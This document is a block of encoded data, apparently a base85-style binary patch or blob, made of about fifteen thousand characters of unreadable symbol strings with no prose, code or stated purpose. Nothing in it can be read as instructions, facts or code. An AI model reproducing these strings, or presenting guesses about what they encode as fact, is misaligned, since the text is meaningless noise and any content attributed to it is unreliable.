z-aEyc*u+nrksIMSw{%yA;6lecyQnME%b+#V3u8|5XT#-OG|`k-9s%b%WXkSpy2 z*284~nCWSU4iyiBtQ2W6cBkBsw(Y-xoJq(zrOS153AAw48Q$ zcp)ZLSg3+dc*GfMj(Fli|3KrNa(HCV59e8gdX9l9cmy;lj{(9m&E>|Bxnecl_77EK zMdypys<9+RJ~Lz&1EocRI+9>~lUlt<1dToJmLx$FFC-Se&}Kd=Ou5%3t?x(@bY^z~ z>~aS?X|O1WdEkA+awrD>>Z3M$f>`;@=qMmd6CWdo@hAQKJ$IW3WTbl_YQ^J?CdXkk zjR{6&x+nrUqRZVvK*1liGra6r(ILgLAPcY8lsLdU(E z7^Q;orwm1CAeIcscj0&0a`Wt|^F;SwEvMDiB~|iHx!vS(H@@O&?Q|&nw8vdZ?~a9o zuW}<-7l0i(Q=u8qLfsw#-$Q}A)SD8;Qc|hK+S16RWu#DP)2u5f~oC z9UMLV%w4UG<+uwKxnpZeyN@^95VV{l-4g5K9FeRA$<~rh2<3k8XOdZilFF$DS@IiW zIMF4L$de5c3r=iKcF

Ah<5``?r`=`R-cnU5Zp1Cj@lf59LF1kpVLR5*c5(uWck z%T4w%{Ppr=CPJt^ST#H@>C3}(h2jXq7sw&=l*o<{VlJY(|u2PuFBI-sfLhcvxa5g4IOs!$zS*R zB-t~6C8W*6WHHIG)>K{AG!PCkkH_omV>Ca=C;WR~FfM_O5FMJlD{Ij4@Q8TUpx~m? z%?+iSCg6}pa}(DMJ0S%bC3>id0!%sCpgB1KOAr6s=wK;jZckB>9T}9{ymd4=N+hMd zJA@2{h<1o1~7j9$zj81CM?r8tYq=DNMdZm)vts;7UFLx~OR9`aYNO5gXC-eCRB^!O%OT|L@i z5;CH!)S#%OUg17WPys2~YB_|sgT3kou8nt`^6p*-8;^v4f=Z0Pa^g$Vj#p@1QuJ`& zJ~SoyB7@`SR;K$+mDK0cPtcs>^7xnNW6#Z1272>t%z%65?h`w~FQ2#EgYHyzG_Q6j z`rlbwRaJeXbMuX{>Y9AW#E^3Sw+|(@JBVQZIKOI9{niE2NJTYprl{nSz2xUSYi zY2FZM>?3VI28XR$(>IHow<=XN)s?OaJgMyu|GcricwX&y_{ZVtP}Sx{$+j1ytBEH2 zi4Z4R+(c^~{P|xM{PTY^d68XM1hpcP_~c#PHxX(NeH`UE9Mm87C!nn&sSV*l{Pkd$ zbc>xiS&dmHa=mTi`bd5JiOOxG`pL0nJ>2FAmwI(eo9W_#+5`Pj0 zl0VwtyJd;!GC4eR>`1%C@|PN8ZAXhPXFF||lU*(r(GC{jCr)WURE@DXlyVZHbuw4m zt)$ECnzs9qofA!8&2Dr(O#OON4eFWM}Zx6_vAXpAF5NByA7 zM^eXEq1)H*tGndQQ)=CRVcnFMTArrer%&kw1a=2}rm|uWx&trk1gU)q$i3!osN{^$ z^2zNEY1KK?(|zX6>7dc>(5KzU?|oA%(s5E#34e1d?0a{_fesbXL(TmXegvZ~_?@cI z6RD;frP~wrmU^~aNB_;YsFOW0r*vZjdtznWqiy2iK7Wf%>xs|RJy+5bcKJI{-E*#0 z_d-w4g?qZ*H9ZM$brR-!E-vd{daG;tRQGan&!q!h8lsoR9slFo_XJ+OB!%82HNE8T zt%*%>$rinIJH3>X@lHqdB0YLjBlObZ;xGB_$6e@U_;WX$CdYHwCZK{=mpfo zN8j$vda9Q_x9>U}pZc;l=c8Wk_kGhh`{BQOncVt$f_=)61N|7$zI-+P0$u%m>2tw` zeT8=VMJM(1P5S&j`idj;OX7aqqnr!jn6Zc$6cEFNUDLmEqwh+qetAz{`91xsqkUJO z>Q~J5RV?dQzU{00sDJHy-?amM7NVcUZBQlnvpiGP-1%E{@(&Azh0>C~L81OyJA=BD z{dK1dt_SvCk1)6q*MH-(L48_(eXc=+%y~6}fu3gnkqi1wJ^fAh&Nnt091Iz>%=Nb{ z8{B-`fAgb3>-YZF1A{ii?KW=1cEQ{2l7<}$w>#7fJ9Te&9x=RSar>5?Vb{sqU8fAY z18;Xn81}^7?zwE(n|8Z*`Me;$x{re-Rc59m`@W&7NIMgau#^u;jwZGYGa9X08ht?g%L6DpY z7PWG?+w9?|qWr*?&^PBxhjcIg(JGYt?Vy>G2p~y*>+bjxHqP1V{>R75R6xixYeG%d zK5=opi_fiuw zbZ3T>FaFRNn9==fV#&v%T+~ddT|-3vj5c}^@%!HH!9aJLHKdR%>{@ut@}kQP?!m4< z`vVsr4G+G$o3K9hM-7GrCy+T@pWb=F^S0z;>;CWigrQLxL5ZuPv#2Ml2aa+(Uqb0qBpb=H%zd=D@af&&1?)ePiglENXZ<1DnnGiV(tcH&k% z&hJ46hq6{s4bI;(PsXZP>m1K%>!L$$-O)dI0&L4PgP-3z$NSbqR^Z7ZUT>W;B*P)W z)c?2KE(4|UNq?daPe8OmV6*-CHfAC`OGsi5pLEb*VsScLSuXu834o!wXlG6Hz+&j& zX-7F`!&bV6BZSVfmj}|2GuTwnSqMgg-`RBjEFstw0TsxtUu8N2o^*@w!iNAmzf7aX zZvJcymJ3-6!W@epV<**t3}eYJBu&0p74ZhVNKy0jZ3k;2@->}r(V9~W_<3Znyh&k! zw0IjbHJn{-K;T6YCfJONh^LXP3Bx=#Jc)<0h!U@dU)WiDT_S$Kxk@AT>G#!s6*?qDOdFr-4Ci?WO2YU3hpeh^v7q z4H%_3)+#YM2qaL7y?}LC7fDG!FG)a_^$su$H6x7{4dLk!8=WdV#>yB#r2`CXw`;_^hbLsvJ4xAUrE5MwrlI>KkE5*a;=bJGN?PR~8a`H~!LKTg zV}s&JAL?2=ihh;iR%N2RLIbp)!SJAU|Eyln5>{m2FWK*eSrX&Lz@RZiHm6V4N`UyK zIk$#$(CBd6K)d&(^2j8psr|Gp0o^~}xyJh8di;Z@SN;en>HlNzy`!Sg5^V1Zgn|kb z1(L-g=O_w-0a3|G1VKO=3H+dbX= z&Ghu^d2eQ|Ui{Bu)dKcD`|PuS68DUyyxLintO_i$F>Qc-lRfpcI8({b&DmsVKy1cN z@LFuWsVh|gx~f_|R3Us{A3Ej9S0Jqc<+yKt+#US5D^ETcR>4J>f(aGPpSP!^9r?f)WwjnyH_`p*J!eF1V?bG zZvc?F7$Zt0bUj0&aBWin$G{CmhQ}Y9ob#qg_;Ioz-vRckoA%`75GFZJAGtm!04dc* zG8f3_EZ@))89lEbN!f@{j#{4^cg*P0P2V8LwOh~55~+b_UqO_<5DF zDH0D-x@^ceHh11mbxP_D?{S}OUEYbAeeC zX#w2!z6>*>Y+()b6Fd5zAl1AeMpX8#;&5 zQii7%7_DyIv{%;;!mav)1J0|~vMVBKxcX2`43SqijXpyBx$eWULvqS($Uf@XVkb_2 zB3*hV+eMNh5EgHNq}EEI+%)3Ii=g(w4;(5rgT3LMDa*9=3AL1LIfcov9-)kQ%C3(O0ChB&yDU=DJnWkggVUD;Gt5`89hYixPt-UWwK@ z6P)t^qo?oR>940r^@SoA>Yw`-aIbhn}9#~c;F-KfcqH1ZzFw)AeMVm3xi>8STDw|M|9s4+waf6 zakon4&9c<0^fmGK??x$REwIq|-h8XSV*pdalBObQ`7X*PvxzMyF{8-PHRX+Deag(7 zY)uw&RsBhsk=0D-Y^G$9I?sr33Xx+&q0a(0KbJ93aJd-@MKVd}#;-nNMWghx06)@kj)oROA= zXlp(_Qpe0ib4^1y<-NhVQvih!wXe6Hjp%$8cwzdkrG@9=Q}X*)d0B3!0aBQ`d<QC+>=yZ*8K~v|M@Ea)z_;tBZL7y5XBly<^oV#^GI;jCl-BO}`fER;E65H%5 zW~J6>yLnrm9ouiKp%6z&b=%jEge{4C;~Wr+D2{;dSg_J)$$IrMY?7k(x(u1#mvHiy zDds+R6lxn4Wy4W_UxZLB`-6z#(_T1K29#OGwo=;Yq*0UGESB49fV-Y>Bb?d*&m+|% z`h7?pwG#CSwGO9|qoA0|w9lLrm+N2bWZT|o)xUl5WW$O?Y=E-g>m-Zu%;qM87>V!{ zuvts+ob2#`1B!wjC=3v6)dJg7T6CeQf`daBd0k;-`9|LaTD1ge+OM+*f|nFIh*?`k z7-~9|5V{|so4MTrO&v4AMiq?tJp3pog58Qt(4$zU0YrvT%(_SKn9tGjbN5@6=` zdGbyR!OvP?c}30@D`p*|+`9SV$c-EBN*u;^9E{C^!#F1-PqZ+WgciU`k3HPd1U*p_ zxcZ4M??wjeEs=8=z7r%s6pg-+gHTD2gUoBH4V8cn7#a z?UUekaJn!@msXwLCb#7`(VYBzUVKmJ0DB$gM)o3d7IRZY+kH^blx%HJR9nEnp3iJh zNo0m9umZw&zBYZEeI^f_Vx@zMx%En{c^1pMmM7YbZ|}3S_C{RD7iFW96)@6@x#+DS zp>)|bObv{nxzoMPi^mDi^Abs?;});*Y$_+*76|Ku`)jJaN6(RQMC#1Nqp3CeoT_CvZji81&lgy4acj4>s6Es8 z@^OmlG7w5btLLYq7xYrkPqkVcBlNz^wRvV-0*Lq~zM6=ujHTHkR>JP zZ~?KLyWz`?ZH!a)SJzIl1aBaF4fJ+SDoj|FP*YR3siJbhJ)7$N?c7e#pm-EdNjTB(6JJ?)B-BL1 z-lzJY60kMME+y|}G*2#eMrXR*%XY~qgJke7Vkur!R@T0eI6`MSc~L70`c6AnkBZ)b zM%SSphpZ_9+umif7kbobrmvn6=}vydiFdf!$P|S8xUnw8BG+%q_eeo*?R3dsPEzJ3 zPj` z{zmzZtSRs2o*CMy$EAk71)pcQGoYUHnpKZYG#);Sku?n>n35XwsqNFg^!JhvUApZ} zYx1x>K!>{7N5kJ>Aj^L<)3-BN{Ty{Ly>7&CV#HTHj}se18c>#CjN_#~IFjuO2PVb# zBSxGwE3%`cN|J<}R&bdOy6cldd_YfL#h zq|+6MSwZAe(EHP-x9KEqVr)hLR|RFoUUs26@Q4%d0u*}*lQ$l4{ndyKn`x`PSfKnm ztvV_eY>TmJ!@hhC@>Rw2L5^kF%Ow!h|fU~636}&{J)Kr zcHYuQ-f5SVXgEe|y7Yp^^-A`VN{EM}y2er4`c_Rngy_{@>RrnH+s{ABa5uzY;y#0%p?5Vj9KGLHtj&iP#!k+JY#Y4#xsO)uCbCQ_gh_4 zS~q1bDoYxVzr>xHB3UH`8ks8E;_Z|JtF3D?4K7!+HGDOcMgySF%%<+Mp^iU1z59hQ z%31MM!Z*#khCHqJ4#!;b(cOGD1GSeR)lOv@KG;0^nT#olIz4@^-F;Pu+3plwq$?tN@0 zn0bvw6pm;3I3mWVN4Ty>b`+cWErW^XYAO3$z_y|}t+Ho?xxcBOuVbN&Q6cEVZ5x>j%k zJ(^k)NI(5Ab>^}j_pa9(v>OWH`QSc5H6Xh{Z#2hsZPs9N=i%f|FAiZt%SG1RT}E#F z=;2sI5y?FQ|;oUcrhZ={2ocUN1ZvL1Yp1oJ+4#P}F zCdRohf%ti+pxlkXt*hLFU7Jr>5U0KSt@gU|$>Yg$C-lQV1blau(wivKX}sR(>BS`j zeSPshBv7Wy!J=u+0WfB1Pl#B0O9-uienYTW#s@iOX_5hmcxD?Z9U$@YrAJ9^zFaT~ z2Ap_y*DEM-TCc_;&4)MXvd6&@g+y*&+RZSgE1?p316fSh^&qqIY|LO5eiJ7ES{8jp zl}&oeKD}V1)VMS0O4wbFR4`Aur6P1#FbDudw7d_`E#K`y%$`jYV}Kn)z`)d znQFp#gU8_s{Bq64bW0fXwaCl0TXV7Gm(I0ZuG?N3EHHQ%dF9~A;;m{Puhc6I`PZ%-VS=?&8W&72#W-StW|HdeUVqs<(Pn?A~JM^9pM!8x!ps4hBM3ay-S82#F?* zmc?&&g}dzEBkbHd^Y#x8?eIrhstyr_6U)Ml;`+(L&5MDD_U+tn!o{7bzaJJQa#($_ zE|`tC*evgC-nVUKAPTH};3LAE`s9dJTV2E4VPZ|f#r#Fxisj7b%gd|k*Lx;nE;|kB z+jUo(-C7wFY0@$1uIMkSgE_bL_;w16%r%ZVk2&_LNgCfO@2={+(&=gY;e@azF|~13 zNa_pAaD>}TsEF{;`2DiWYpH=zVN0EyJrrB7;|1Q@HHAM%xG$y$NjY>Y>oQ)L(7Ho- zLX=B-Tbv&MqYL7E`S_P(@*SW=PTCYYtYAImD1{2HVg8EWs( zDVRo~5!_6hZyz9Nod$gfdC$;cA1G0n2Db}-&$4VEba^$6>N%tZP3aJPQ!t%6D!7G{ z-yuZRI-TYXEA&IBM*9n9vQdS!-Q;(S3AfJVI7iX0sO%UU zSD48q64I_}>G&dLHIwHWMTcgnV_c?S7N15)hjzZ>%R=icfrk{GdL54O6@^(sb|Ibj zmmL!tRb{pCq;jW{X9IbQ$wMdDUf|ef|wax4H6@q`|`M3nd}l)|O9_$5yi? z-%<3~hdxP}70kKR8`9&H|K#c1ou$%Dp8L+8=J|l)9NrM*@^43l4rcN@=c(G{ z-+4p%Iak>^U%Mz@rzG@qp`~-d{k44Eca%f8Q0GEpp@Mt8p+gn<&PCQX1qPFp!!;ew z#ZE;957tA68pSQKaU;~V zVOFT*X>ZuXcE0P|RhtrzN$BK$hil_@QOUFQu*suk*LO#2CC`b_DFDkjx_?R`RODQP zTTZp02Q!5$^E4uswF}%o7ur@9JcO_4b-E8#6jv76MXcOkaUX6VRF*u4uVSDcBQ3&J zrBM;9#sVH+x@@b;-@w<*RXj!qi>oS2BG#;}Jid+*s;b|?3HD(gW3$55wY?Dprvi`h zRom+NN%*>3r^m#0arN8vh;`2ukI5rK^*bVb!yD>3MIutuL>0N=FW@;1v#WW34zU@m z;yFWGQu9G1ax>h@^Bc>0P3twpR&ET>3qyGGTNT_`3SW?QhT4J=g0eiHLnX z)N8|Eq+yyWYQIH9L@?B@;oF@?-&Pf`t+TsmfYqz50?V4TG;n<4TUc>s^_2*PaQ_$z9->`8rD(Yxf;Q5a( zyTDv@O&dzUWN_@uBARp{a4W zhNQkJ3%nug^VNui{DSE+i7B(2rznzH1ZOLYyw0{S&)>#r9;hH^&wdMy zs;1jbdNd<pmQ^>Tp7ll;se#{tA64G|C$Z=Vi4O<`x76i@<#n9K5(SmYVsr( zxVJuaiVxIi)Lq(I{8aF;xAB>+1mRofDL%0A_$NMaviIFjd>|R`)G0pDe98xMiVyUK zT|C7HBIS8c@qu^Er%&;Lxzm9xr})4ibl@pIkTc%=Cq6KD<`f^eI1?uN@h`^n7r#Zx zlJU*{X*{18`%h=(&@IbnM9cFpWrpj?E@dT}<}YQZxGXQ_U;}@x=a1$|W@qQ~%X)Y& zj_2bXcPtCLE0kA?CZ)VrgeU-*rD8mp!0K<~`EA?`h7fq%w=V* zdg{0Fd@DljVs^prfqZuZ-`rCMZ3$3p8 zCh^0s^?VlB)y-D)ul4){>#cU)U+ekRt6QC-t-sdut-p6mEfoG*&;Q;lOD?qC_iH_0 zk*8>TK=tQ(zNUiE&Y?7dK{C!r!1=GNDsI7xYT`ry%C;sc|obyef0Z3PKVD^R8anp=@wX(w0lZ`0xb7Ar@`v+;6){&2@oRozaJeMG_i1?Azo(Vb$q?gGQT zj^W0Gzgo|y?;QCky;~X`QE1Gg@})z6w=A){&{VSXOON|*ITl`IuAnkHkhEKot5#&G z+c`Q^w_AyeD6%$F`8qnfTUFCtWb4}bb>d*R8V@hF4^kPMVcM%{Q!92%=p37u-mC44 zD0a$G8DG}ls~hPqcB$?hC%Es`|HjHO#0ayYlmW8(e)WdtCIi}+c}vFKu~g@xi^-Zo zL_)Xg=D?I&j(1cR443@kz*H4}DgXcFz&wm*Ld2r=*^Gh#uR`evmN~pW@1lQ# zaBIuvIuqH1=fAL7Ep%aTgt4mq1mW^Zn$d2G`!#W}UCa1G$xQiWyn!!mRozF_8frGb zwY?B{&d6=y7tCFj&;7-ND`oDdlJ&f;-vi&%*&x!czis$Q!Yz3C#zp#YZ{w$wT_bq= zbm#f<)uuK6E@c(%Y0>BJz!m;d%AP|>bZ!G6*0ZFBdlYf!6oVf8CS^v~8Asz2Refwe zPb|!+wiVBd;Bo@w4( z{C$_Dxdcog-~69(V63Z_=9BIJ#DSU5TS)cX{euHTXStXb%>4%k=BJXy-Ti|D^JhwC zxty1qoxhx4_-`DTmBNZ4%atPCGu|u34ZF)LC3v!e)aYh9tJTs|DHC*%6@@00&2 zW!$3%_Ao{U*|5(by$97(%OPuWqk$_$wTt4?dUdN+E5iCyZ~u_8Wjdo@QYNQsbhGW< zsg#Mz0qwL2O(T5h==aQg0I~P9JPGzcm8|q7>yMgJ3kpxctv1e6B~xKta2AteM$tC4 z$A4J))FC?jOUb%)q^0*(|H(>5{KvuX|A>@D)mjail^pLHUBw^oO$CXZ?9V1V{M0g^ zQ*v^!TD^X9xX~&?JlY<%BOaHFgcDDW_SR2-17TQz25lB_dCq`L6W^;4*K}nGyS8^49{jf` z8L`*v;QJc@JXe-nxzCqr8w*j(m80+I3zXhYLq_D@}s0N!g!q-z#5qsp@3l4oEM$3t;aF&@@#JZIV@u`WP%wY8p*j7CIHF z+&eBSZuqHWHaTEWeMJ>&7Z^wFAaLH~s#755eLO@R=S$x;MJBV~gp9=b^QcZ!8tgYS^xy&| zyQUEy`|r_+(qIME8C3Fq3$J=yPF{qiVa%)W0Wv zJ(`#5t?hB``JQ@sv>;1W*B7L|oz8r`sHjmlkkGT8Epxo28C5r!qrQ`GaJ;P7TQ^kQ zvs3JGyn>;sA8A$JElWOLHP@&g9q!q!sy|+{kE$PAP~WTjdQ5QZt)JNI*=syJUiYSI zm?GEMZ)QH(2-awrq3_-QD08wI9n~<)qw%A|;AAVYw_#qg_eYP%$#*Q(+r>1ph?j8_ z>|$q;u@p6f5s6jXY0duWT0lW zUbrE;{aP?JiJbq8Stc2!gV&8hyB&6n@wGBtMdF6g%#~M1nDHmL&^?h)g&~D+zI-cD zW|<&*`c|Cd{(cTZs?P2o)N+ko2=C^g`CMAeo5bz(#W?H5Xm8kvH)7u#$>4*M@}br9 zp>y+LNc3T<@nIS9VcqvZGx)Mg`Eu&{a=ZERCi?Q%_zI5r3h(=hGWdy0`AO*cU3Bx4 zO7xSi@w+_YcXi)Smcd_6%KxUGzr35jVxqrtjlb%MzxuwvCPRRhRDiZ#z+JZhy~F_h znt=Nw0fzel7=}P2sX$}BKvTCs^Ta^Qnn3H3K->L5dxjuKsURo4AQ!hFx5Oa#njp_y z&AH(qZ-!uBso4jCfh1Dd6)zySGjD$7rhv6B* zo29~A^uj;7g}0ruTx!C*M#6jc!}}N_2Babe^&*DcB1RG;Mr$Gh2EgVE5pLI?8!bGO z-tg1KM=T~rF4sh^jzkjnBR3eLwxpuA^`ds&qJEG7@<;p*7X6Ofq7K{qh`iCjT0gKw zG-;k6d0sTdD?jK`G(5zQiZ6!xsUM9+%oz(m`n(v%dw$GIF=v(h&hf>vUGn3wh~?t* zp6XAOy_QUtQ#fuA+OTLnMFD`{R{a13RtEV|s?O)_jz|e@usOXs3 z7jZA+|I-|*rnc@s&7sD|Cnl$+XTHtO%`f23F0QPu5!N?0x4v)h?C$OVI5<2yJ~=h- zlq`xkY?B}4-yn`Z&HH}@aTHJYix+*|k)l+d-JLA;WchdV?nim{A29F#wH)fa)kN1* zf`88+?)@}}GVHGV&vGb%gsew@nM3__@4x3zznk~o#<#zl_y65F)Wzk+-*TwGbnlkK zvbmY^7c76ecT26)%&93K_wirM=6{sg{EwJ-yW^dapXPncb^SN9356hv1TfIb2i%S?t(FM7ZEjK!Nu9^DoiFS`J_TGtndg zZ2U_!J@@|aCSL!sXlg_sL6jS}ub@^J?p^;MFPfZxh-P+g-)#Z5nhe(J3x6(}kW}{<+whHr z2b8WlzCdiB>~EsE2_Dkgd%QNs4f`pYyJ8Ktj*~Y@?^AP2yr*yn+do5Dz|UR=Hyuad zi2vNkE1_$aTjoc*W@K4hj_Mr0!H*8Tp0fDruHPfC^2Aovzlgm4A17W;|330EI2;}6 z;X9Ly8?|vw{+hqzQq%NW-ytD+Ecb$IUH>zE=j!C~Y-iVo=?D5xhm$8VD_t8mujoJ9 zOP);Mam52!^?m45rmz>>nyF9j1xTh$r#ic}uua?x(M_32sdW1&)_5<1=OXg&x)}Sz zru^${Uv2-dv;9B4WAd-F{r}RA$-mC_|2o?%50xeT>uhiH=!&SY#D$+<0Ja|_q?7;x zK#&dq0Bn%LNPf0S#wl2Mqr+vyAyl4vZMd`>K>&p3bwynI2XU(Nrn5NB>r7$j8=)*p zWtr_S*r>L}9?SQ^kGLe{kH>Y9n;jyI^}hrG89%6MR}V;&oU3a94MEru18DbcA6<;R}J8 zYsJEsA%|1G1=r$kBxEiYcLD)V?>tdFKb+Y-_>_Z{_Ah#o<7x=j0rAamX6?qZaG7<( zy6#5_*Z=56_Pq5l)_CfzPh7}oeX;lb(kJ8KR3`81u^nF)9z-<$QH*^4>1OiCqu0!- zi!mY3k7G6!Jhv|CYC+-BQp~=8Dn{ymp~g6qy3ddWEwIIrJ)v&YL51>N^k)LFME_BY zG}WEbxxD+QVx$tMu3}QcV`oTAnqipR2d)7tO;ZxQlgb}$5=j$KYK(Eb#r!J;$GLVN z%)#AZeHNX(+WqR=g-?p_byJ2wk@>Yl7&tBxE zGoD-ReD8m?NgBj!&iAUObld?JegD;qtfJg&aCj#7VsN|vS1b2dk_LGI%K+8lH^C6pWXZI#N_lU0tD;Ui1B zDii#b4Iwhor^YiGzuF{JW&4|7f928dY)(#~SioQB(U9iJee`d=$jTV>@4ZMtrX%dH zUgSKdKljgGWQ`nc+0R}i8|fy`uU;gn6C2`ZFH$%%@akzVk{C2{@hoaHSW$JRFFf~G zF_QH$`>$eTol5B4u5`L;ML|Kw%`gn?TUG<_NAaZ1a07M@rs1}a7mXAnY<~vQZmd!R zn~`o^-|SX%Td$r5(oxeKzuF|e$l$=AZIV}Ku8aR_lc=)rofadvVhLEzpKTI3OB5gK zCg*iI3fb2&TB2{PjrnBSJCqSKFL9n+ibfPF>HTH#X0=?xd1WfGEoCq9ahby8Vx0zb zY6-P0++qb=ov{+<6Z`yU&xi4KW~jYL=(s>!K$71Ij;Q{kiXOW64&a%FUvo2-4cv$pRq%DsN2 zW+S(qMgBHV&LQ+uj8;X?d3cEW?T$M!S1YnFp0&JvtfUoZD#6WcvaAratmUJ1A?E_= zveLbd&y=RlId|t4?|jJD%JteQP>K2D#QO1Cj?v zPIljdV73NnRufg0w6!5>D-K064|m*$(|?%o>aUHCk22M~n>{AztW$hla!Dw(zhbRH zdUSt|(zSV`djt47Y>Fs7(rB7xr^C@Ty_PhRGJHi4v$;H7I`p!bZo(>vqwvKUn!OL; z$YsN`$yzHzy6AzUTKLLcS$VN9&%8#PQkDU zT*~dSDN%aHGAn*)*Cu@WUgJGF~=3f78^@^*Xq06A*>b{ts%1-WM3yn`tKZ}{HS^roz!)+xF#0M^=wcazk zJp5whFiym$Qecf8dRS?2wWyrpib>&B>8_y2-3uAYw)a;K#@Gd%Q}f15)vCYre3)M= zD`;4_kgPuzZtGkP*Ppxm-tBEm!=kp?+QVdqCu94UMGHv@YlDU^T@u2Qq1_RL&^v{L zYR&~kOJE$4ROKd-pRVxr;)jPwpC3ktUHaPo}+?8 zwVh|IC(_?BE}Bp7l(T)CsG^Chv+7kc?!Ee@#*CTgsJL|eW%E4wdbQ{?jru8{&Y2H= z&#w9OYR{1O?gImlH`??sV{;KdJ{qKYM?FvIzu>&ndD`e6pRZ@pf6a z_h6|0WCs`ZcGXPdaP;fRZcXo7f@|;L#No*vo~m&pNW)WKr*Z#n%n{;clqa)E%C@LV zrM6KIeZMaGLC_;FZTaqJRd0^Jwk8}B@8tHnu1UVRDWvPZUHYy^cX#G^eVDSfyM%cc zI>HAFGGFj>bbhVO_;o$rdSln=gv;o`f+NkoJ!tU+{tn#fUd7*Q`n2 z3su88;te0NmwGP>yAHXq?g}^C^edT#y~iO|?4hpSWGv=Rwb9Tn>^W|8v;E;GIyqi$ z3VP3W9ZeOU7)!aNb30=o4rYlK&_!o4y(c7Qk8BprXJ>t`xUq5B1Ke|id~Wl2ijtD~pxt@zXuZdx>xwvcK zoA>}qJ{NGCEy+kEFfSsP!9H8cU^^gGVB~&wu$@@EA#T^VO)Bg-&A3_-Su2Hn;U#T>fTf5?0Eo^$ zVirQSXs)vY@p~e5dzu%Ck&PO`M4?|sk>R5CUPaUAJ&|&=C(?)6GB}vF$3R1Dp77Fc zeGCy&^yz8~Ah?7u+=~|)3h~N$d^h1C`qDk;TqlG@?3b7)e%`?(KEXYjXIw>JRc|OO zD@Jd}$9L1h{5Jfe+F$h}Z#UszU2A)Fn;~hd05rps+WW zGI|{XFWpWexRUd`c zFDso{uYMg70%zj0q2aR1oqGiqONzXN3^sqodyu{)k#Qnnl0lI?9fH~&Nn~Am{zLwC zJ)_DJ4)N|%Y}_K^Z8VfbS@W9P>(&q`nSBIElpX9q;x77{*CYj2^($DTmZ6Y=#I%ss1elUp$dZHANVqYX^Rp0dM7$Bjy##Ir zbIu$GIMLF&mf{I*T|{6<1dIMz69C9G21t2oX|cc{Knkc748;P^G@Wh=fbRJ~cS&GvYm0qTzPf0j}J;($N!fMhO68pkPa1bts zyaypA(@emejih!;a@M{=AM|VCWrVCI895f9t^xpK%3_p?pqgY9Xr!q(h|YjqnH||F zP4^N*4YLP}YyvECc_h)0Z&UuuNLVDEj2xfmV-Ng>q{EXXL?*pCa}YlF*@;p)k22qx zgCZg}D8ahcJCMwlTrr-WPyhU4P9lZR)r%1*(?IKBlNZb3FGE?x%2Gxa5$u3`0vbr@ z1D^3A$?~9M!~;jnDZru-Tj)!z+LU-K@a;hXEAr*Y$mtLz@$n;)@T?U*Lc1Z_;!Rs zS_LI0Ct0V0rv@Zw14klDZ!H&<0IpgRFESmWxM77LW0+CC%#6dszxOwM{d<( z>P&6WrCLjdQ0mXVe)W#H+}h;MS{4ihGzI8bLImL%K6R!fQ3B{?$(?Wja14N669@)U zQmrE1Eg~q;00sNgpBx!5gIZV-IzVY{B-CV05I}JC0Qp=`4ygi3YM_S_z^+o{dzI+YyYS!Of4U z9ap>I_Fxm_OZW!Kz%s&b715B~ew(j91xAy=kooFTrn6=3l^;<(<}GIb}@t&r99x;+=Iz zlj5yCc`g(HLX+EWR0VX$DqyPymLXLsb+<|Z5YNKr5r8f{Vvrw66P@)=@x7hpCrAD? znTy!4P^YJ(=5XR-_02~EPExste77GeILv*Bi(>v%==O;uJ}`gL6kHo2^ZFd+<4YGsD`IkvrBjNB#6cjM)XfyNpn}R;u!zHoFC35ggyT{SD}BxRCmHR)jRDj z7F#nwMO+RgJXr9x{N!@!!!!NKR_bx^?XiP31nvs*_zEiQ3Q8i9=8YkBx?n#EHi+LI zpkqmaxl%f7MInhHxA6KZtBkafMLlL*4)va9nVLt7O`T4k!Znxq?U(Z+&wwAzj8LHL z)Bx{`gHRj8al*()8`FhhOJRaYb5Y9bJ`iIcc@FCfy0mZB1hOj#l=Bs&KN@xTdI=09 z>9k$u-&lns*9HjWUVUUUVl--zfYU9uRdpl{0THjc>|x#vLG{Asm0FjO1r9xHuag14)Tj5ya)pQw zW2e*>*eq7R)lKSjgwYusxhJGhP%!f_E@W@8nR=sN}2WdXLExia9fWng9%-fw}aOJ1W+D zO!L~imqN&3Jf6Ue8cUhHNIeCSK?1KL9ZZw6Y>{5OGI7dYoa@)jS|fdd_;nO_ZZdMsz2f>8 zyz@FMLB@4sGE?WPmr(Lkhq2}il}RDmOY1`;7Lp=fp7nccoo{aB*uIrq+3Zn!&U5Wh zdVO|tt~cl5y*DPc?@pW6n!0Bye9o*?*6)g`oU60m1y;jAnSFz*nNGxE2(>j5)Zg30>h2 zupJ1MM{)W)@s#y1YDxpb|94!u>9aPUQus!iZoh`jFVr7SuR}JX&GsUJ$bt zp#TEVq$|~a-#;<49sMY5beG3Ls*wsA)QTO~kp|9Ur`c6oY~KLW zY*`-(KNQ$Orkt zIr3 zQ~)`Jt1%b?KNc4CCk*|FY^dU8_~FAt0~K#W8v0prl%obh`GZ-_5f%hA;(7nYOUI`U z?)3~JYyc})T+0aAPK}a0?E1nOR7Zc(IBJaPY*%^}?zkZ6mfsc#!m+ddzU-^vUj@>D zVKB&9WGlrO_{~Dk%s>lD!+^B-qh&od@SuW;KvuE^T`(lMnnExFG2nF5x!|?V( zU&5qp6330jztmS3|5(FufA3G--1>SEJoUo^9(W;If=e0UizV`}b6w-h4kbaLg%H6Ys#Pja8fVx#*QSrWTqguA{9@eR} z@`-CFbVz!=sq6c%@8NHkgm|(ynAExwUXx#7tx;m=qp)AXhRh&++)N@7UeNh8F#=)MmPv4pgxffI|*+Wl{ z-bS>cS@-=61y8VPCJr_1zrMmAUK(ImFhT01Vd<)V8FBYFA-%QiY1Kc`yYLvX`L-Cr zWPZ|IcA&-K*vyy)ML-6^ICil4xi9>A(%e1xP?ARs!a=RkML>N4Dh0mGavO0FYNF<| z3H?C1ZGLeQLCB~Od?CzW4zFWDXoW%)bq*<)PAJM_Nir zT2#}w5)myBIFU0&F2B`(dfaY!&yTc>U-&mQzO1u%(3C~qOuv1f?{}j(=8tE@4$oa? z1+&;cUu@#ri~BNtBkv3T^*1whnah6=Nhh1Saca^@AADblhbeUN$ES8kEu)37K+~ri z^o?rtzD+uAuX3BDL>lCn41|)$0Ws(2OtfJne#vEm7uR~X>JA{JxjRhYz{In&SbmL7 zTZJ8EhqUc*81&M65vibOs!WupE3-6@z`v0~n(X%muxYmYhvyrQ7M;D@V}gOD_bo3{ zKrRU%t48_mRxSSQIIoOX`Np-K#HpVpG0%Kq&%;eCZY;`KAhvt{mVBc#^36?QU8kEEK4f!LH7XI|J;Th~ z*JSb+y}Es*C3Ia z^h;RFsl2Ud*$wFKB?sJ>mAfY+)S$5!F|cZP3xriBR-e)fD_#R}BaMa7=HxF<9 zdXkj*&F>@n7ParUn*T6+>^=S1Be_E`GVJF=_rKeINq<((ZXLaH|F{1z>F@WXq|>kN 